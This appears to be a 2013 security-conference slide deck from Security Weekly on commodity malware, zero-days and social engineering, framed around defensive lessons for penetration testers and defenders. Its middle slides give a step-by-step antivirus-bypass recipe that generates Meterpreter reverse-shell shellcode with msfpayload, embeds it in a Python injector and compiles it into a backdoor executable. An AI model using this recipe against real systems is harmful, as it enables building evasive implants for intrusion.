Give Me Three Things: Anti-Virus Bypass Made Easy

Security Weekly™
Presents:
Give Me Three
Things
Sometimes, three is bad
http://securityweekly.com

Brought To
You By:
consulting@blackhillsinfosec.com

The Need for Focus
• It is easy to get caught up in the latest “Hack of the
day”
• Let’s talk about
• iPhone attacks, Android Malware, Backdoors from chargers, DLP,
Hacking ATMs, breaking into drones, hacking obscure software X
• But, when we get popped, it is going to be something
simple
• Cool stuff is cool, but the basics will kill you
http://hacknaked.tv Copyright 2013

#1 Crappy Malware
• Had enough presentations on the “Not so
advanced persistent threat?”
• Somehow, the belief is if we can make fun of
the attackers skill level it makes us….???
• Better? Smarter?
• Why?
• Because…..

Results Matter

About that Malware
• It tends to be well
known
• It tends to have AV
signatures*
• Tracing it back to a
specific group can be
hard
• Anyone can download it
• It is not 1337 or even
31337 Just right

Poison Ivy

Citadel

AV Bypass Made Easy
• Many of these tools
have options to export
to a raw string of hex
characters
• In fact, that does not
even matter
• We can use Ghost Writing
techniques
• Simply exporting and
re-importing as a script
does the trick
• Flame did this with Lua
This and cookies:
Why I pentest

Ghost Writing: Creating
the Binary

Converting to Assembly

Editing the Assembly

Finalize the Payload

Python Injection
• Another technique is to:
• Convert your payload into Raw output
• Import the Raw output into a python script
• Convert the Python script into an executable
• It is all because the text sections of an .exe not being
reviewed by many AV vendors
• They would have to write the signature for Python itself
• Not likely
• Great write up by Mark Baggett
• http://tinyurl.com/SANS-580-Python-AV-Bypass

Windows AV Bypass - Setup
• Create a Windows box with prerequisites
• Same as target (32-bit vs. 64-bit)
• Install Python:
http://www.python.org/
• Add Python to system PATH
• Install PyWin32:
http://sourceforge.net/projects/pywin32/
• Install PyInstaller:
http://www.pyinstaller.org/
• Download PyInjector:
https://www.trustedsec.com/files/pyinjector.zip

Windows AV Bypass - Config
• Extract files from PyInjector
• Move pyinjector.py into root of PyInstaller folder
• Use msfpayload to generate alphanumeric shellcode (on any
machine)
• msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 C | tr -d '"' | tr -d
'n' | more
• Make sure payload matches architecture!
• Within pyinjector.py:
• replace: shellcode = sys.argv[1]
• with: shellcode = '<msfpayload output>’
• where: <msfpayload output> = output from the above msfpayload
command

Windows AV Bypass - Compile
• While in the PyInstaller Directory:
• python utilsMakespec.py --onefile --noconsole pyinjector.py
• python utilsBuild.py pyinjector/pyinjector.spec
• New backdoor should be under:
• [PyInstaller]/pyinjector/dist/pyinjector.exe
• Rename the executable, deploy, profit
• Don’t forget your listener!!!

Or You Could Just Choose
Option 15
OOppttioionn 1155

#2 0-day Dejour
• Yeah, another favorite for attackers
• There is always another 0-day
• Attackers seem to jump on this bandwagon
fast and stay on it till it is no longer effective
• Why? Because it works
• They do a lot with volume
• What is your patch success percentage?

Lessons
• Black-list AV is easy to bypass
• In fact, we had to do it with Poison Ivy last
week
• Yeah, a piece of malware 5 years old
• The attackers will be exactly as advanced as
they need to be
• Which is not very advanced

Focus and Future Plans
• Hacker Guard Lesson: don’t just focus on
malware, focus on detecting an attacker’s
impact on a system
• Get away from Black List Security
• Now
• Right now
• .. I mean after this presentation

#3 Users Making “Mistakes”
• How could we have a
presentation without this?
• There is no way hackers
would be this successful
without users
• Ha Ha!!! Users are “dumb”
• Yeah..
• Right?
• Not so fast sparky

We are all Dumb
• Or, the pretexts for the attackers are getting
really, really good
• Some SE pretexts we use are not fair
• Major insurance company and a change of
coverage
• Linked-in merit badges
• If the attack is tailored, it is successful

Caller ID Spoofing

Hail Pentest Geek!
http://www.pentestgeek.com/2013/04/30/pwn-all-the-sauce-with-caller-id-spoofing/

Lessons
• Users are going to make mistakes
• Not because they are dumb
• Well, half of them are below average
• Because they are not trained
• And because the attackers are good

Focus and Future Plans
• Hacker Guard Lesson: Once again, focus on
attacker actions
• Limit the damage the user can do
• Implement Firewalls
• Implement Software Restriction Policies
• Implement Internet Whitelisting
• But don’t simply believe the user is stupid
• Train them: Securing the Human

Conclusions
• While bright shiny objects are bright and
shiny
• We need to come back to basics and
fundamentals
• We loose sight of that in this industry

OCM at Black
Hat
• Offensive
Countermeasures at
Black Hat 2013
• http://tinyurl.com/HN
TV-BH-2013

End of Line
• Hack Naked TV Episodes
• http://www.hacknaked.tv
• Watch us:
• Blip.tv: http://blip.tv/securityweekly
• YouTube: http://youtube.com/securityweeklytv
• Subscribe via iTunes:
• https://itunes.apple.com/us/podcast/pauls-security-weekly-tv/id121896233?mt=2

Give Me Three Things: Anti-Virus Bypass Made Easy

More Related Content

What's hot

Viewers also liked

Similar to Give Me Three Things: Anti-Virus Bypass Made Easy

Recently uploaded

Give Me Three Things: Anti-Virus Bypass Made Easy

Editor's Notes